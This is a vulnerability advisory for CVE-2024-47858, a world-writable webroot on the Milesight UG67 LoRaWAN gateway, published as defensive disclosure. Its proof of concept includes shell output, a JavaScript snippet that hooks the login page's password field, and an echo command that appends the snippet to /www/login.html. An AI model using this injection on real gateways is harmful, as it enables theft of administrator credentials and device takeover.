Milesight UG67: World Writeable Webroot Allows for Privilege Escalation

Attackers with any user account on a Milesight UG67 LoRaWAN Gateway can gain full root access by manipulation of the webroot.

Details

• Product: Milesight UG67 Outdoor LoRaWAN Gateway
• Affected Versions: 60.0.0.42-r5, likely others
• Fixed Versions: 60.0.0.44
• Vulnerability Type: Local Privilege Escalation
• Security Risk: low
• Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67
• Vendor Status: fixed version released
• Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-005
• Advisory Status: published
• CVE: CVE-2024-47858
• CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47858

Introduction

The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for outdoor deployments.

More Details

Attackers with access to any user account on a Milesight UG67 LoRaWAN Gateway can modify the source files of the web interface, which makes it possible to send all credentials entered via the web interface, including those of administrative accounts, to an attacker-controlled system.

Proof of Concept

Any user account with the ability to perform arbitrary commands on the gateway (see for example rt-sa-2024-003 on how to gain command execution via PostgreSQL) has read and write access to the webroot (located at /www/) of the web interface, since the corresponding source files are world-modifiable:

root@GATEWAY:/www#  ps | grep uhttpd
 3450 root     13892 S    /sbin/uhttpd -f -w 1800 -h /www -r GATEWAY -x /cgi-bin -u /cgi -t 1800 -T 30 -k 20 -A 1 -n 3 -N 100 -D -R -p 127.0.0.1:17080 -p [::1]:17080 -C /etc/https.crt -K /etc/https.key -s 127.0.0.1:17443 -s [::1]:17443
root@GATEWAY:/www#  ls -la
drwxr-xr-x    1 root     root          4096 May  7 23:36 .
drwxr-xr-x    1 root     root          4096 Apr 29 22:42 ..
drwxr-xr-x    1 root     root          4096 May  7 23:21 cgi-bin
drwxrwxrwx    2 root     root           374 Feb 19 20:37 css
drwxrwxrwx    3 root     root            26 Feb 19 20:37 dist
-rw-rw-rw-    1 root     root          1107 Feb 19 09:15 example.html
drwxrwxrwx    2 root     root          1073 Feb 19 20:37 images
-rw-rw-rw-    1 root     root        854674 Feb 19 09:15 index.html
-rw-rw-rw-    1 root     root          8164 Feb 19 09:15 index_mobile.html
drwxrwxrwx    2 root     root           743 Feb 19 20:37 js
drwxrwxrwx    2 root     root           157 Feb 19 20:37 lang
drwxr-xr-x    1 root     root          4096 May  7 21:45 log
-rw-rw-rw-    1 root     root        272918 May  7 23:53 login.html
-rw-rw-rw-    1 root     root          1719 Feb 19 09:15 login_mobile.html
drwxrwxrwx   11 root     root           197 Feb 19 20:37 view

This enables attackers to modify the login page, for example by adding a script component that sends credentials to an attacker-controlled system. The following example was used as proof of concept:

<script>
pwdinput = document.getElementById("password");
pwdinput.addEventListener("change", (ev) => {
   console.log("Password Input changed: ", pwdinput.value);
});
</script>

The following command edits the login page in-place and adds the script above. While this appends the script after the closing </html> tag, common browsers will still execute it:

echo '<script>pwdinput = document.getElementById("password");pwdinput.addEventListener("change", (ev) => { console.log("Password Input changed: ", pwdinput.value); });</script>' >> /www/login.html

As a consequence, all credentials entered into the web interface after compromise, including those of administrative accounts, can be collected by attackers.

Workaround

Manually change the file permissions of the HTML source files of the web interface to remove write-access for all users.

Fix

The default file permissions for the HTML source files of the web interface should be fixed to restrict access to only those accounts that actually require access.

Security Risk

Attackers who are able to execute arbitrary commands on a Milesight UG67 LoRaWAN Gateway, can collect valid user credentials by modifying the webroot of the web interface. If login details of an administrative user can be obtained, this allows attackers to completely take over the device, and extract all configured secrets.

Since all accounts, except the root account, only have a limited shell configured, which does not allow to execute arbitrary commands, this attack requires another vulnerability (like rt-sa-2024-003) to gain shell access. The attack furthermore requires user interaction, since an administrative user has to authenticate to the web interface, or perform an equivalent action that results in observable ubus traffic, while the device is compromised. In combination these vulnerabilities pose a medium risk.

Timeline

• 2024-04-25 Vulnerability identified
• 2024-04-29 Customer approved disclosure to vendor
• 2024-05-14 Vendor notified
• 2024-06-28 asked Vendor for update
• 2024-07-03 Vendor will provide Update until end of July
• 2024-07-24 asked Vendor for update
• 2024-07-30 Vendor stated: Work in Progress
• 2024-08-09 Vendor stated: Fix expected Q3/24
• 2024-09-24 CVE ID requested
• 2024-09-24 asked Vendor for update
• 2024-09-24 Vendor stated: Fix in 60.0.0.44
• 2024-10-04 CVE ID assigned
• 2024-10-07 asked Vendor for update
• 2024-10-08 Vendor stated: Fix will be available mid-October
• 2024-10-18 asked Vendor for update
• 2024-10-21 Vendor stated: Fix will be available mid-November
• 2024-11-04 Vendor released fixed version for testing
• 2024-11-05 Vendor released fixed version
• 2024-12-10 Customer approved public release of vulnerabiltiy details
• 2024-12-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/